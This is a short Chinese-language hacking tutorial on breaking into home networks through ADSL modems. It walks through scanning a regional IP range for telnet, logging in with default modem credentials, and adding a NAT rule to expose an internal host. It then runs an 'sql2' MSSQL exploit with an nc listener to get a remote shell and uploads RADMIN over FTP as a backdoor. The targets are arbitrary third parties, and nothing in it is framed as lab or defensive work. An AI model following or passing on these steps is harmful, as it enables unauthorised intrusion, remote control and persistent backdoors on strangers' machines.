如何穿透ADSL路由入侵內網

2020-10-28 08:07:33

穿透ADSL路由入侵內網方法：

　　1.掃描

　　現在很多ADSL MODEM都是通過80 23 21三個埠來管理，但80 21埠有很多伺服器都有開啟，沒怎麼特徵性，於是選擇了23埠，開啟SUPPERSCAN，填上所在地區的IP段，跨多幾段都沒關係，反正SUPPERSCAN的速度就是快)眨眼間，結果出來了，開23的主機還真不小啊:)我挑了幾臺出來，在瀏覽器那裡輸入IP:218.xxx.xxx.xxx，OK。登陸對話方塊出來了，輸入USER:ADSL pass:adsl1234(因為這裡的adsl modem一般是華碩的，預設是adsl adsl1234)bingle 一矢中的。

　　2.對映

　　入侵已經成功了一半，要進一步入侵內網，要進行埠對映，但是連內網的拓撲，都不知道(更不用說內網主機的埠開放情況了)又怎麼對映呢?一般來說，MODEM的內網IP預設是192.168.1.1，而大多數就把自己主機的IP設成192.168.1.2。因此只要試試把192.168.1.2的埠對映出來就行了(但如果使用了dhcp就麻煩了)把整臺主機透明地對映到外網，具體做法如下:進入NAT選項---新增NAT規則---BAMID---填入主機IP:192.168.1.2，到此192.168.1.2已經透明地對映到192.168.1.1上了，存取ADSL MODEM就等於存取主機192.168.1.2了。

　　3.檢測漏洞

　　現在再請出SUPPERSCAN對218。xxx.xxx.xxx進行掃描，掃描結果已經不同了，開放的埠是139 1433等，剛才只是開放了80 23 21而已(也就是說對映已經成功了)該是X-SCAN出手了，掃弱口令最好不過了。

　　4.溢位

　　既然沒有弱口令，也沒開80，那隻好從逸出方面著手了，但沒開80 21 也就webdav .sevr-u的溢位沒戲了，嚮導了RPC溢位，但實踐證明RPC溢位也是不行的，LSASS溢位也不行。

　　5.募然回首，那人卻在，燈火闌珊處

　　這時侯，目光轉移到1433上了，於是nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 bingle 成功地得到一個shell了。

　　6.設定後門

　　到這裡，入侵已經成功了，餘下的是掃尾留後門，至於後門，用FTP上傳RADMIN上去就可以了。

如何穿透ADSL路由入侵內網

熱門文章